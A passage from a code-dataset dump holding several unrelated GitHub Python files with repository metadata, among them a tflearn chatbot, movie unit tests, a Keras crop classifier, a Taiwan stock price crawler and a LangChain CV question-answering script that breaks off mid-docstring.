tflearn.fully_connected(_net, len(self._output[0]), activation=\"softmax\")\r\n\t\t_net = tflearn.regression(_net)\r\n\r\n\t\tself._model = tflearn.DNN(_net)\r\n\t\t\r\n\t\tif force:\r\n\t\t\tprint(\"recreating the model!\")\r\n\t\t\ttry:\r\n\t\t\t\tself._model.fit(self._training, self._output, n_epoch=trainingIterations, batch_size=neurons, show_metric=True)\r\n\t\t\t\tprint(\"Saving model on Disk!\")\r\n\t\t\t\tself._model.save(self._modelOnDisk)\t\r\n\t\t\texcept:\r\n\t\t\t\tprint(\"Something wrong has happended training your model!\")\r\n\t\telse:\r\n\t\t\ttry:\r\n\t\t\t\tself._model.load(self._modelOnDisk)\t\r\n\t\t\t\tprint(\"found model on disk!\")\r\n\t\t\texcept:\t\r\n\t\t\t\tprint(\"recreating the model!\")\r\n\t\t\t\ttry:\r\n\t\t\t\t\tself._model.fit(self._training, self._output, n_epoch=trainingIterations, batch_size=neurons, show_metric=True)\r\n\t\t\t\t\tprint(\"Saving model on Disk!\")\r\n\t\t\t\t\tself._model.save(self._modelOnDisk)\t\r\n\t\t\t\texcept:\r\n\t\t\t\t\tprint(\"Something wrong has happended training your model!\")\r\n\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\tdef retrain(self, levels = 2, neurons = 10, iterations = 1000, verbose = True):\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\t\tself.train(force=True, levels=levels, neurons=neurons, trainingIterations=iterations)\r\n\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\tdef askBot(self, question = \"Who are you?\", accuracy = .7):\r\n# ~ #-------------------------------------------------------------------------------------------------------------------\r\n\t\t_inWords = question.lower()\r\n\t\t_bagOfInWords = [0 for _ in range(len(self._words))]\r\n\t\t_inWordsTokenized = nltk.word_tokenize(_inWords)\r\n\t\t_inWordsTokenized = [self._stemmer.stem(w) for w in _inWordsTokenized]\r\n\t\t\r\n\t\tfor word in _inWordsTokenized:\r\n\t\t\tfor i,w in enumerate(self._words):\r\n\t\t\t\tif w == word: \r\n\t\t\t\t\t_bagOfInWords[i] = 1\r\n\t\t\r\n\t\t_result =self._model.predict([numpy.array(_bagOfInWords)])\r\n\t\t\r\n\t\tif max(_result[0]) > accuracy:\r\n\t\t\t_resultIndex 
= numpy.argmax(_result)\r\n\t\t\t_tagPredicted = self._labels[_resultIndex].lower()\r\n\t\t\t\r\n\t\t\tfor _tag in self._corpusData[\"topics\"]:\r\n\t\t\t\tif _tag['tag'].lower() == _tagPredicted:\r\n\t\t\t\t\t_responses = _tag['responses']\t\t\t\r\n\r\n\r\n\t\t\tif _tagPredicted == \"content\":\r\n\t\t\t\t_resp = \" ,\".join([ tag[\"tag\"].lower() for tag in self._corpusData[\"topics\"] ])\r\n\t\t\telse:\r\n\t\t\t\t_resp = random.choice(_responses)\r\n\t\telse:\r\n\t\t\t_resp = random.choice(self._notKnownResponses)\r\n\t\t\t_tagPredicted = \"not Known Responses\"\r\n\t\r\n\t\treturn {\"tag\":_tagPredicted, \"answer\":_resp}\r\n\r\n\r\n#-------------------------------------------------------------------------------------------------------------------\r\ndef stopServerHandler(signum, frame):\r\n#-------------------------------------------------------------------------------------------------------------------\r\n\tprint( 'Stopping Chatbot with Ctrl-C')\r\n\texit(0)\r\n\t\r\n############################################\r\n############################################\r\n############################################\r\nif __name__ == '__main__':\r\n\t\r\n\tsignal.signal(signal.SIGINT, stopServerHandler)\r\n\r\n\tchatBot = ltoChatbot(corpusFile=\"Ansible_Corpus.json\", forceTraining=False, levels=2, iterations = 700)\r\n\t\r\n\twhile True:\r\n\t\tresp = chatBot.askBot(input(\"Alejandro: \").lower(), accuracy=.8)\r\n\t\tprint()\r\n\t\tprint(\"BOT: \",resp[\"answer\"])\r\n\t\tprint()\r\n\t\tif (resp[\"tag\"] == \"goodbye\"): exit(0)\r\n\r\n","repo_name":"ltoRhelDemos/python-ansible-chatbot","sub_path":"chatbotLib.py","file_name":"chatbotLib.py","file_ext":"py","file_size_in_byte":10406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31749727140","text":"from project_movies.movie import Movie\nfrom unittest import TestCase, main\n\n\nclass TestMovie(TestCase):\n\n def setUp(self) -> None:\n self.movie = Movie('Matrix', 2000, 6.5)\n\n def test_initializing(self):\n self.assertEqual('Matrix', self.movie.name)\n self.assertEqual(2000, self.movie.year)\n self.assertEqual(6.5, self.movie.rating)\n self.assertEqual([], self.movie.actors)\n\n def test_name_raises_value_error_if_name_is_an_empty_string(self):\n with self.assertRaises(ValueError) as ve:\n self.movie.name = ''\n self.assertEqual(str(ve.exception), \"Name cannot be an empty string!\")\n\n def test_year_raises_value_error(self):\n with self.assertRaises(ValueError) as ve:\n self.movie.year = 1500\n self.assertEqual(str(ve.exception), 'Year is not valid!')\n\n def test_add_actor_adds_actor(self):\n self.movie.add_actor('Neo')\n self.assertEqual(['Neo'], self.movie.actors)\n self.assertEqual(len(self.movie.actors), 1)\n\n def test_add_actor_returns_message(self):\n self.movie.add_actor(\"Neo\")\n self.assertEqual(len(self.movie.actors), 1)\n result = self.movie.add_actor(\"Neo\")\n self.assertEqual(len(self.movie.actors), 1)\n self.assertEqual(str(result), 'Neo is already added in the list of actors!')\n\n def test_gt_if_self_rating_higher_than_other_rating(self):\n self.second_movie = Movie('John Wick', 2010, 4)\n result = self.movie > self.second_movie\n self.assertEqual(str(result), f'\"Matrix\" is better than \"John Wick\"')\n\n def test_gt_if_self_rating_lower_than_other_rating(self):\n self.second_movie = Movie('John Wick', 2010, 10)\n result = self.movie > self.second_movie\n self.assertEqual(str(result), f'\"John Wick\" is better than \"Matrix\"')\n\n def test_repr(self):\n 
self.movie.add_actor('Neo')\n self.movie.add_actor('Trinity')\n expected = 'Name: Matrix\\n' \\\n 'Year of Release: 2000\\n' \\\n 'Rating: 6.50\\n' \\\n 'Cast: Neo, Trinity'\n\n self.assertEqual(expected, repr(self.movie))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"KstoyM/python_OOP","sub_path":"testing/project_movies/test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73610869282","text":"import os\nimport sys\n\nimport hug\n\nimport jinja2\nfrom jinja2 import Markup\n\n_HERE=os.path.split(__file__)[0]\n\ntemplates=jinja2.Environment(loader=jinja2.FileSystemLoader(os.path.join(_HERE,\"templates\")))\n\n\n\n@hug.static(\"/static\")\ndef static_dirs() :\n return (os.path.join(_HERE,\"static\"),)\n\n\n\n@hug.get(\"/hello/{who}/\",output=hug.output_format.html,examples=\"martin?age=48\")\n@hug.cli()\ndef index():\n return templates.get_template(\"index.html\").render(**locals())\ndef hello(age : int ,who) :\n \"\"\" Ein Gruss \"\"\"\n age=age+2\n liste=[\n { \"name\": \"Eins\"},\n { \"name\": \"Zwei \"}\n ]\n return templates.get_template(\"compare.html\").render(**locals())\n\n\nif __name__==\"__main__\" :\n hello.interface.cli()\n\n\n\"\"\"\ngit init .\ngit remote add origin username@189.14.666.666:/home/ubuntu/workspace/project.git\ngit add .\ngit commit -m \"Initial commit\n\"\"\"","repo_name":"alex-gaus/nex-server","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37741172084","text":"# %% Imports\nimport pandas as pd\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder\nimport matplotlib.pyplot as plt\n\nimport tensorflow as tf\nfrom tensorflow.keras import Sequential\nfrom tensorflow.keras.layers import Dense\n\nfrom geneticalgorithm import geneticalgorithm as ga\n\n#%% General\ndatasetURL = './data/data.csv'\nepochs = 8\n#%% load the dataset\ndf = pd.read_csv(datasetURL)\ndf = df.astype({'X': np.int8, 'Y': np.int8, 'Green': np.float64, 'Red': np.float64, 'NIR': np.float64, 'Red_edge': np.float64, 'crop': np.int8 })\n\n# %%\ndf.head()\n\n# %%\ndf.describe()\n\n# %%\ndf.crop.value_counts().plot.barh(color=\"red\")\n\n# %% Un Random a todo el dataset\ndf = df.sample(df.shape[0])\ndf.head()\n# %% \ndf.pop('X')\ndf.pop('Y')\ndf.pop('Red')\nfigure = plt.figure(figsize=(19, 15))\nplt.matshow(df.corr(), fignum=figure.number)\nplt.xticks(range(df.select_dtypes(['number']).shape[1]), df.select_dtypes(['number']).columns, fontsize=14, rotation=45)\nplt.yticks(range(df.select_dtypes(['number']).shape[1]), df.select_dtypes(['number']).columns, fontsize=14)\ncb = plt.colorbar()\ncb.ax.tick_params(labelsize=14)\nplt.title('Matrix de correlación del Dataset', fontsize=16);\n\n# %% vamos a balancear el dataset, subset de CROP = 0\n# subset de CROP = 0\ndf0 = df[df.crop == 0]\ndf0.describe()\n# %% subset de CROP = 1\ntempDf1 = df[df.crop == 1]\ndf1 = tempDf1.sample(df0.shape[0])\ndf1.describe()\n\n# balanced = df\n# %% ahora se combinan los dataset\nbalanced = pd.concat([df1, df0])\nbalanced = balanced.sample(balanced.shape[0])\n\n# %% ahora grafiquemos para verificar\nbalanced.crop.value_counts().plot.barh(color=\"red\")\n\n# %% un describe\nbalanced.describe()\n\n# %% un head\nbalanced.head()\n# %% \nfigure = plt.figure(figsize=(19, 
15))\nplt.matshow(balanced.corr(), fignum=figure.number)\nplt.xticks(range(balanced.select_dtypes(['number']).shape[1]), balanced.select_dtypes(['number']).columns, fontsize=14, rotation=45)\nplt.yticks(range(balanced.select_dtypes(['number']).shape[1]), balanced.select_dtypes(['number']).columns, fontsize=14)\ncb = plt.colorbar()\ncb.ax.tick_params(labelsize=14)\nplt.title('Matrix de correlación de dataset balanceado', fontsize=16);\n\n# %% ahora preparemos la red neuronal\noutputs = balanced.pop('crop')\ninputs = balanced\n\n# %%\ninputs.head()\n\n# %%\noutputs.head()\n\n# %% Extrae los dataset de entrenamiento y pruebas\ninputTrain, inputTest, outputTrain, outputTest = train_test_split(inputs, outputs, test_size=0.30)\nfeaturesCount = inputTrain.shape[1]\n\n# %% ahora configuremos la red neuronal\n# define model\nmodel = Sequential()\nmodel.add(Dense(featuresCount, activation='relu', kernel_initializer='he_normal', input_shape=(featuresCount,)))\nmodel.add(Dense(3, activation='sigmoid', kernel_initializer='he_normal'))\n# model.add(Dense(3, activation='sigmoid', kernel_initializer='he_normal'))\n# model.add(Dense(3, activation='sigmoid', kernel_initializer='he_normal'))\nmodel.add(Dense(1 , activation='relu'))\n\n# %% \nmodel.summary()\n\n# %%\nmodel.compile(\n # optimizer=tf.keras.optimizers.RMSprop(), \n optimizer='adam', \n loss=tf.keras.losses.BinaryCrossentropy(from_logits=True),\n metrics=['accuracy']\n)\n# %% \nmy_callbacks = [\n tf.keras.callbacks.EarlyStopping(patience=2),\n tf.keras.callbacks.ModelCheckpoint(filepath='./logscheckpoint', monitor='val_loss', verbose=1, save_best_only=False, mode='auto'),\n tf.keras.callbacks.TensorBoard(log_dir='./logs'),\n]\n# %%\nhistory = model.fit(inputTrain, outputTrain, epochs=epochs, batch_size=128)\n\n# %%\nloss, acc = model.evaluate(inputTest, outputTest, verbose=1)\nprint('loss: ', loss)\nprint('acc: ', acc)\n\n\nprint('history: ', history.history)\nprint('history: ', history.history.keys())\n\nepochsSerie = range(1, len(history.history['accuracy']) + 1, 1)\n\nplt.title ('Curvas de entrenamiento')\n\nplt.plot(epochsSerie, history.history['accuracy'], 'r--', label='Training acc')\nplt.plot(epochsSerie, history.history['loss'], 'b--', label='Training loss')\n\nplt.ylabel('Porcentaje')\nplt.xlabel('Epochs')\n\nplt.legend()\nplt.figure()","repo_name":"javierrojas6/rice-crop-detection","sub_path":"code/python/rn/cultivos.py","file_name":"cultivos.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"5953383029","text":"from typing import Optional\n\nfrom bisheng.template.field.base import TemplateField\nfrom bisheng.template.frontend_node.base import FrontendNode\nfrom bisheng.template.template.base import Template\n\n\nclass InputOutputNode(FrontendNode):\n name: str = 'InputOutputNode'\n base_classes: list[str] = ['input', 'output']\n\n def add_extra_fields(self) -> None:\n pass\n\n @staticmethod\n def format_field(field: TemplateField, name: Optional[str] = None) -> None:\n FrontendNode.format_field(field, name)\n if name == 'Report':\n if field.name == 'memory':\n field.show = False\n elif field.name == 'input_node':\n field.show = False\n elif field.name == 'chains':\n field.show = True\n field.field_type = 'function'\n field.display_name = 'functions'\n elif field.name == 'report_name':\n field.show = True\n field.display_name = 'Report Name'\n field.info = 'the file name we generate'\n elif field.name == 'variables':\n field.show = 
True\n field.field_type = 'VariableNode'\n if name == 'VariableNode':\n if field.name == 'variables':\n field.show = True\n field.field_type = 'variable'\n field.required = True\n\n\nclass InputNode(FrontendNode):\n name: str = 'InputNode'\n template: Template = Template(\n type_name='input',\n fields=[\n TemplateField(\n field_type='str',\n is_list=True,\n multiline=True,\n required=True,\n show=True,\n name='input',\n display_name='输入内容',\n ),\n ],\n )\n description: str = \"\"\"输入节点,用来自动对接输入\"\"\"\n base_classes: list[str] = ['input']\n\n def to_dict(self):\n return super().to_dict()\n\n\nclass InputFileNode(FrontendNode):\n name: str = 'InputFileNode'\n template: Template = Template(\n type_name='InputFileNode',\n fields=[\n TemplateField(\n field_type='file',\n show=True,\n name='file_path',\n value='',\n ),\n TemplateField(\n field_type='str',\n show=True,\n name='file_type',\n placeholder='提示上传文件类型',\n display_name='Name',\n info='Tips for which file should upload'\n ),\n ],\n )\n description: str = \"\"\"输入节点,用来自动对接输入\"\"\"\n base_classes: list[str] = ['fileNode']\n\n @staticmethod\n def format_field(field: TemplateField, name: Optional[str] = None) -> None:\n FrontendNode.format_field(field, name)\n field.show = True\n\n def to_dict(self):\n return super().to_dict()\n\n\nclass OutputNode(FrontendNode):\n name: str = 'OutputNode'\n template: Template = Template(\n type_name='output',\n fields=[\n TemplateField(\n field_type='str',\n list=False,\n multiline=True,\n required=True,\n show=True,\n name='output',\n display_name='展示输出内容',\n ),\n ],\n )\n description: str = \"\"\"输出节点,用来表示输出\"\"\"\n base_classes: list[str] = ['output']\n\n def to_dict(self):\n return super().to_dict()\n","repo_name":"dataelement/bisheng","sub_path":"src/backend/bisheng/template/frontend_node/input_output.py","file_name":"input_output.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","stars":2577,"dataset":"github-code","pt":"54"} +{"seq_id":"23345868480","text":"import pyftdi.serialext\nfrom pyftdi.ftdi import Ftdi\n\n#replace ftdi with what your port.py says\nser = pyftdi.serialext.serial_for_url(\"ftdi://ftdi:232:A50285BI/1\")\nser.baudrate = 115200\nser.write_timeout = 0.1\n\n\nwhile True:\n try:\n data = ser.read(1)\n #print(data)\n if data != ' ':\n print(\"It works!\")\n except KeyboardInterrupt:\n break\n\nser.close()\n\n","repo_name":"peteblank/waifu-conversation","sub_path":"extra/recieving.py","file_name":"recieving.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71085698082","text":"import numpy as np\nimport math\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nsavedir = \"../slides/images/\"\n\nmaxl = 4\n\ndef gridpoints(lx, ly):\n start = 0\n end = 2**maxl\n\n gx = [2**(maxl - lx) * i for i in range(1, 2**lx) if i % 2 == 1]\n gy = [2**(maxl - ly) * i for i in range(1, 2**ly) if i % 2 == 1]\n\n g = [(x, y) for x in gx for y in gy]\n\n return list(zip(*g))\n\ndef drawAll2():\n f, ax = plt.subplots(1, 1)\n for i in range(1, maxl+1):\n for j in range(1, maxl+1):\n pts = gridpoints(i, j)\n if (i + j) < 2 + maxl:\n ax.plot(pts[0], pts[1], \"ob\", ms=7)\n ax.axis([0, 2**maxl, 0, 2**maxl])\n ax.set_xticklabels([])\n ax.set_yticklabels([])\n plt.savefig(savedir + \"sparsegrid_d4.png\", bbox_inches=\"tight\")\n 
plt.show()\n\ndrawAll2()\n","repo_name":"elfeck/caml","sub_path":"src/sparse_dots_dim.py","file_name":"sparse_dots_dim.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16924725570","text":"from sklearn import tree\nfrom sklearn.metrics import mean_squared_error, r2_score\nimport numpy as np\nimport math\nfrom sklearn import metrics\nimport BaseFunc\nmon_inEng={'Jan','Feb'}\nif __name__ == '__main__':\n \n obs_img_path=r'F:\\TestDemo1\\obs_pr__1967_2.tif'\n true_pixel_index = BaseFunc.GetTPixelIndex(obs_img_path)\n \n R_accuracy_list=list(range(12))\n R2_accuracy_list=list(range(12))\n std_accuracy_list=list(range(12))\n CRMSE_accuracy_list=list(range(12))\n MAE_accuracy_list=list(range(12))\n\n for mon in mon_inEng:\n print(\"month----\"+str(mon))\n mon_num=BaseFunc.GetMonthNum(mon)\n month_path_train=r'F:\\5_TrainingDataSet\\pr'+\"\\\\\"+mon+\"\\\\TrainNet\"\n year_folders_list_train=BaseFunc.GetSubfoldOfMonth(month_path_train)\n month_path_test=r'F:\\5_TrainingDataSet\\pr'+\"\\\\\"+mon+\"\\\\TestNet\"\n year_folders_list_test=BaseFunc.GetSubfoldOfMonth(month_path_test)\n \n \n x_train=[] ; y_train=[]#存储训练集或测试集中XY值\n BaseFunc.GetXYDataset(year_folders_list_train,x_train,y_train,true_pixel_index)\n x_test=[] ; y_test=[]#存储训练集或测试集中XY值\n BaseFunc.GetXYDataset(year_folders_list_test,x_test,y_test,true_pixel_index)\n \n #构建训练模型\n clf = tree.DecisionTreeRegressor()\n clf.fit(x_train, y_train)\n \n \n # Plot outputs\n y_pre_test = clf.predict(x_test)\n \n #输出训练后模型y值和真实值y之间误差\n #输出相关性\n R=np.corrcoef(np.array(y_test), np.array(y_pre_test))[0][1]#np自带函数计算\n R_accuracy_list[mon_num-1]=R\n # #输出R2拟合度\n # R2=r2_score(y_test, y_pre_test)\n # R2_accuracy_list[mon_num-1]=R2\n # #计算std方差\n # std_accuracy=math.sqrt(np.var(np.array(y_pre_test)));print(std_accuracy)\n # std_accuracy_list[mon_num-1]=std_accuracy\n # #计算中心化均方根误差\n # # y_test[:]=y_test[:]-sum(y_test)/len(y_test);y_pre_test[:]=y_pre_test[:]-sum(y_pre_test)/len(y_pre_test)\n rmes=mean_squared_error(y_test, y_pre_test,squared=False)\n # # CRMSE_accuracy_list[mon_num-1]=rmes\n # #计算MAE\n MAE=metrics.mean_absolute_error(y_pre_test, y_test)\n MAE_accuracy_list[mon_num-1]=MAE\n for MAE in R_accuracy_list:\n print(MAE)\n \n\n \n\n\n","repo_name":"ParinZhang/HESS245","sub_path":"2_DecisionTree.py","file_name":"2_DecisionTree.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27462932377","text":"\"\"\"Top-level package for eyecandies.\"\"\"\n\n__author__ = \"Eyecan.ai\"\n__email__ = \"info@eyecan.ai\"\n__version__ = \"1.0.3\"\n\n\ndef main():\n from pipelime.cli import PipelimeApp\n\n app = PipelimeApp(\n \"eyecandies.commands\", \"eyecandies.stages\", app_version=__version__\n )\n app()\n","repo_name":"eyecan-ai/eyecandies","sub_path":"eyecandies/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":288,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"} +{"seq_id":"74489950882","text":"import pickle\nimport requests\nfrom datetime import date\nfrom io import StringIO\nimport pandas as pd\nimport json\ndef transform_date(date): \n y, m, d = date.split('/')\n return str(int(y)+1911) + '/' + m + '/' + d\n\nhigh = pd.read_pickle(\"/home/pineapple/Documents/stock/crawler/history/最高價.pkl\")\nlow = pd.read_pickle(\"/home/pineapple/Documents/stock/crawler/history/最低價.pkl\")\nstart = 
pd.read_pickle(\"/home/pineapple/Documents/stock/crawler/history/開盤價.pkl\")\nend = pd.read_pickle(\"/home/pineapple/Documents/stock/crawler/history/收盤價.pkl\")\nvolumn = pd.read_pickle(\"/home/pineapple/Documents/stock/crawler/history/成交股數.pkl\")\ncount = pd.read_pickle(\"/home/pineapple/Documents/stock/crawler/history/成交筆數.pkl\")\n\ntoday = date.today()\ndf_time=pd.Timestamp(today)\nday = today.strftime(\"%Y/%m/%d\")\ndatestr = today.strftime(\"%Y%m%d\")\n#if start.index[-1] < df_time:\nstartPrice={}\nhighPrice={}\nlowPrice={}\nendPrice={}\nvolumnPart={}\ncountPart={}\n#datestr = '20230220'\n#day = '2023/02/20'\n#df_time=pd.Timestamp(day)\n#上市\nr = requests.post('https://www.twse.com.tw/exchangeReport/MI_INDEX?response=csv&date=' + datestr + '&type=ALL')\nif datestr in r.headers[\"Content-disposition\"] and len(r.text)>0:\n print('it is today data')\n df = pd.read_csv(StringIO(r.text.replace(\"=\", \"\")), header=[\"證券代號\" in l for l in r.text.split(\"\\n\")].index(True)-1, index_col=['證券代號'])\n df=df[df.index.str.len() <5]\n #display(df) \n for i in df.index:\n try:\n startPrice[i] = float(df['開盤價'][i].replace(',',''))\n highPrice[i] = float(df['最高價'][i].replace(',',''))\n lowPrice[i] = float(df['最低價'][i].replace(',',''))\n endPrice[i] = float(df['收盤價'][i].replace(',',''))\n volumnPart[i] = float(df['成交股數'][i].replace(',',''))\n countPart[i] = float(df['成交筆數'][i].replace(',',''))\n except:\n print('error 1:', i)\n continue\n#上櫃\nr2 = requests.post('https://www.tpex.org.tw/web/stock/aftertrading/daily_close_quotes/stk_quote_result.php')\njson_data = json.loads(r2.text)\nstock_json = json_data[\"aaData\"]\n#print(stock_json)\nif transform_date(json_data['reportDate']) == day and len(r.text)>0:\n print('it is today data 2')\n df2 = pd.DataFrame(stock_json)\n df2 = df2.set_index([0])\n df2=df2[df2.index.str.len() <5]\n for j in df2.index:\n try:\n startPrice[j] = float(df2.loc[j][4].replace(',',''))\n highPrice[j] = float(df2.loc[j][5].replace(',',''))\n lowPrice[j] = float(df2.loc[j][6].replace(',',''))\n endPrice[j] = float(df2.loc[j][2].replace(',',''))\n volumnPart[j] = float(df2.loc[j][8].replace(',',''))\n countPart[j] = float(df2.loc[j][10].replace(',',''))\n except:\n print('error 2:', j)\n continue\n \n start_new = pd.DataFrame([startPrice], index = [df_time])\n start_merge = pd.concat([start,start_new])\n start_merge.index.name = 'date'\n start_merge.columns.name= 'stock_id'\n start_merge = start_merge[~start_merge.index.duplicated(keep='last')]\n start_merge.to_pickle(\"/home/pineapple/Documents/stock/crawler/history/開盤價.pkl\")\n\n high_new = pd.DataFrame([highPrice], index = [df_time])\n high_merge = pd.concat([high,high_new])\n high_merge.index.name = 'date'\n high_merge.columns.name= 'stock_id'\n high_merge = high_merge[~high_merge.index.duplicated(keep='last')]\n high_merge.to_pickle(\"/home/pineapple/Documents/stock/crawler/history/最高價.pkl\")\n\n low_new = pd.DataFrame([lowPrice], index = [df_time])\n low_merge = pd.concat([low,low_new])\n low_merge.index.name = 'date'\n low_merge.columns.name= 'stock_id'\n low_merge = low_merge[~low_merge.index.duplicated(keep='last')]\n low_merge.to_pickle(\"/home/pineapple/Documents/stock/crawler/history/最低價.pkl\")\n\n end_new = pd.DataFrame([endPrice], index = [df_time])\n end_merge = pd.concat([end,end_new])\n end_merge.index.name = 'date'\n end_merge.columns.name= 'stock_id'\n end_merge = end_merge[~end_merge.index.duplicated(keep='last')]\n end_merge.to_pickle(\"/home/pineapple/Documents/stock/crawler/history/收盤價.pkl\")\n\n volumn_new = 
pd.DataFrame([volumnPart], index = [df_time])\n volumn_merge = pd.concat([volumn,volumn_new])\n volumn_merge.index.name = 'date'\n volumn_merge.columns.name= 'stock_id'\n volumn_merge = volumn_merge[~volumn_merge.index.duplicated(keep='last')]\n volumn_merge.to_pickle(\"/home/pineapple/Documents/stock/crawler/history/成交股數.pkl\")\n\n count_new = pd.DataFrame([countPart], index = [df_time])\n count_merge = pd.concat([count,count_new])\n count_merge.index.name = 'date'\n count_merge.columns.name= 'stock_id'\n count_merge = count_merge[~count_merge.index.duplicated(keep='last')]\n count_merge.to_pickle(\"/home/pineapple/Documents/stock/crawler/history/成交筆數.pkl\")","repo_name":"itony215/stock_real_time","sub_path":"update_price.py","file_name":"update_price.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"35118096658","text":"import pandas as pd\ncsvData = pd.read_csv('./../0.0 - data/data.csv')\n# header = X\n# header = None, names = ['time', 'space', 'range']\n# index_col = X\n# index_col = False\nseries_data = pd.DataFrame() # or something like that\n\nseries_data.to_csv('export_file.csv')\n\nseries_data.to_csv('exported_file.csv', header=False, index=False)\n\n# mode=a for appending an existing file","repo_name":"cgmoganedi/PythonBasics","sub_path":"a_Python3.6Essentials/1.4 - data analysis with pandas/pandas-0.4.py","file_name":"pandas-0.4.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72355804642","text":"import sys\nfrom pathlib import Path\nfrom typing import List, Union\nfrom langchain.docstore.document import Document\nfrom langchain.document_loaders import PDFPlumberLoader, Docx2txtLoader\nfrom langchain.chat_models import ChatOpenAI\nfrom langchain.vectorstores import Chroma\nfrom langchain.text_splitter import CharacterTextSplitter\nfrom langchain.embeddings.openai import OpenAIEmbeddings\nfrom langchain.chains import RetrievalQA\nfrom dataclasses import dataclass\nimport pickle\n\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\nclass Config(): \n model = 'gpt-3.5-turbo-16k'\n # model = 'gpt-4'\n llm = ChatOpenAI(model=model, temperature=0)\n embeddings = OpenAIEmbeddings()\n chunk_size = 2000\n chroma_persist_directory = 'chroma_store'\n candidate_infos_cache = Path('candidate_infos_cache')\n if not candidate_infos_cache.exists():\n candidate_infos_cache.mkdir()\n\ncfg = Config()\n\nquestions = [\n \"What is the name of the job candidate?\",\n \"What are the specialities of this candidate?\",\n \"Please extract all hyperlinks.\",\n \"How many years of experience does this candidate have as a mobile developer?\",\n \"Which universities are mentioned in the CV?\"\n]\n\n@dataclass\nclass CandidateInfo():\n \"\"\"\n Contains the name of the candidate and the question / answer list.\n \"\"\"\n candidate_file: str\n questions: list[(str, str)]\n\n\ndef process_document(doc_path) -> Chroma:\n \"\"\"\n Processes the document by loading the text from the document. \n There are two supported formats: pdf and docx. Then it splits \n the text in large chunks from which then embeddings are extracted.\n :param doc_path a path with documents or a string representing that path.\n :return a Chroma wrapper around the embeddings.\n \"\"\"\n if not isinstance(doc_path, Path):\n doc_path = Path(doc_path)\n if not doc_path.exists():\n print(f\"The document ({doc_path}) does not exist. 
Please check\")\n else:\n print(f\"Processing {doc_path}\")\n loader = (PDFPlumberLoader(str(doc_path)) if doc_path.suffix == \".pdf\"\n else Docx2txtLoader(str(doc_path)))\n doc_list: List[Document] = loader.load()\n print(f\"Extracted documents: {len(doc_list)}\")\n for i, doc in enumerate(doc_list):\n i += 1\n if len(doc.page_content) == 0:\n print(f\"Document has empty page: {i}\")\n else:\n print(f\"Page {i} length: {len(doc.page_content)}\")\n text_splitter = CharacterTextSplitter(chunk_size=cfg.chunk_size, chunk_overlap=0)\n texts = text_splitter.split_documents(doc_list)\n\n return extract_embeddings(texts, doc_path)\n \n\ndef extract_embeddings(texts: List[Document], doc_path: Path) -> Chroma:\n \"\"\"\n Either saves the Chroma embeddings locally or reads them from disk, in case they exist.\n :return a Chroma wrapper around the embeddings.\n \"\"\"\n embedding_dir = f\"{cfg.chroma_persist_directory}/{doc_path.stem}\"\n if Path(embedding_dir).exists():\n return Chroma(persist_directory=embedding_dir, embedding_function=cfg.embeddings)\n try:\n docsearch = Chroma.from_documents(texts, cfg.embeddings, persist_directory=embedding_dir)\n docsearch.persist()\n except Exception as e:\n print(f\"Failed to process {doc_path}: {str(e)}\")\n return None\n return docsearch\n\n\ndef read_saved_candidate_infos(file_key: str) -> Union[None, CandidateInfo]:\n \"\"\"\n Reads a pickle file with the questions and answers about a candidate.\n :param file_key The key - file name used to retrieve the pickle file.\n :return either nothing or a set of questions and answers.\n \"\"\"\n cached_file = cfg.candidate_infos_cache/file_key\n try:\n if cached_file.exists():\n with open(cached_file, \"rb\") as f:\n return pickle.load(f)\n except Exception as e:\n print(f\"Could not process {file_key}\")\n return None\n\n\ndef write_candidate_infos(file_key, candidate_info):\n \"\"\"\n Writes a pickle file with the questions and answers about a candidate.\n :param file_key The key - file name used to retrieve the pickle file.\n :candidate_info The information about a candidate which will be pickled.\n \"\"\"\n cached_file = cfg.candidate_infos_cache/file_key\n with open(cached_file, \"wb\") as f:\n pickle.dump(candidate_info, f)\n\n\ndef extract_candidate_infos(doc_folder: Path) -> List[CandidateInfo]:\n \"\"\"\n Extracts the questions and answers from each pdf or docx file in `doc_folder` \n and saves these in a list. First it loops through the files, extracts their content\n as embeddings and caches these and then interacts with ChatGPT. The answers are then \n saves in a data structure and cached. 
